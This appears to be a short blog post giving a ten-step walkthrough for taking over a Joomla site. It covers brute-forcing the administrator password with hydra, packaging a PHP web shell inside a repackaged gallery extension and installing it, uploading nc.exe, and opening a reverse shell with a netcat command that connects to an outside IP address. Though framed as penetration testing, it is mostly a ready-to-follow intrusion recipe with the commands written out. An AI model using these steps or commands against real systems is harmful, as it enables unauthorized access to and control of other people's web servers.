Step 1:
Find the Admin password (Password Guessing, Brute Force or Dictionary attack).
Tools: hydra or brutus
Example:
hydra -v -L login.txt -P pass.txt -m /administrator/index.php www.fabrikam.com http-get
hydra -v -L login.txt -P pass.txt -m /administrator/index.php www.fabrikam.com http-get-form
Step 2:
Goto http://www.fabrikam.com/administrator/ and login with the Username and Password you've got from Step 1.
Download Joomla Extension (eq. GalleryXML = Photo Gallery) from:
http://extensions.joomla.org/extensions/photos-a-images/photo-gallery/12504
Save it to any folder you want (eq. Z:\Tools\PHP Shell folder).
Step 3:
Extract com_galleryxml.zip to Z:\Tools\PHP Shell folder.
Step 4:
Edit the galleryxml.xml control file and put dshell.php (PHP Shell) in the admin section.
Step 5:
Copy dshell.php to com_galleryxml/admin folder.
Step 6:
Archive or zip the contents of com_galleryxml folder into com_galleryxml.zip.
Step 7:
Use the "Extension Manager -> Upload & Install", browse and upload com_galleryxml.zip file.
Step 8:
Launch the PHP Shell from:
http://www.fabrikam.com/administrator/components/com_galleryxml/dshell.php
Step 9:
By using dshell.php functionality, upload nc.exe to the remote server.
Step 10:
From the Pen-Tester machine, type:
nc -v -l -p443
From dshell.php page, execute Netcat by typing:
nc -v 131.107.1.222 443 -d -e cmd.exe
If the connection was successful, you should get the command prompt on your machine.
References:
http://docs.joomla.org/How_you_reset_an_administrator_password%3F
http://forum.joomla.org/viewtopic.php?t=10985
http://community.contractwebdevelopment.com/joomla-how-reset-super-admin-password
http://www.dart-creations.com/joomla/joomla-tips-and-tricks/25-forgot-your-super-administrator-password.html
No comments:
Post a Comment